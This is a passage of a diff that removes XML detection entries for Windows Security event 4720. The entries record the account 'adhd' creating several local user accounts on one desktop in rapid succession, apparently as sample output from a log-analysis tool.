-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.7889620Z'/&gt;&lt;EventRecordID&gt;4339&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gabriel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1049&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gabriel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gabriel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4333</recordid>
-            <time>2020-06-11 22:04:55.689364300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.6893643Z'/&gt;&lt;EventRecordID&gt;4333&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Raymond&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1048&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Raymond&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Raymond</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4327</recordid>
-            <time>2020-06-11 22:04:55.560674300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.5606743Z'/&gt;&lt;EventRecordID&gt;4327&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joshua&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1047&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joshua&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joshua</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4321</recordid>
-            <time>2020-06-11 22:04:55.468251100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.4682511Z'/&gt;&lt;EventRecordID&gt;4321&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kyle&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1046&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kyle&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kyle</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4315</recordid>
-            <time>2020-06-11 22:04:55.368522200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.3685222Z'/&gt;&lt;EventRecordID&gt;4315&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brandon&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1045&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brandon&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brandon</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4309</recordid>
-            <time>2020-06-11 22:04:55.260882600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.2608826Z'/&gt;&lt;EventRecordID&gt;4309&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Evelyn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1044&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Evelyn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Evelyn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4303</recordid>
-            <time>2020-06-11 22:04:55.163380000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.1633800Z'/&gt;&lt;EventRecordID&gt;4303&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Austin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1043&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Austin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Austin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4297</recordid>
-            <time>2020-06-11 22:04:55.43628000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.0436280Z'/&gt;&lt;EventRecordID&gt;4297&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Roger&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1042&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Roger&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Roger</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4291</recordid>
-            <time>2020-06-11 22:04:54.970865300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.9708653Z'/&gt;&lt;EventRecordID&gt;4291&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Bobby&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1041&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Bobby&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Bobby</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4285</recordid>
-            <time>2020-06-11 22:04:54.884694700Z</time>
-            <channel>Security</channel>
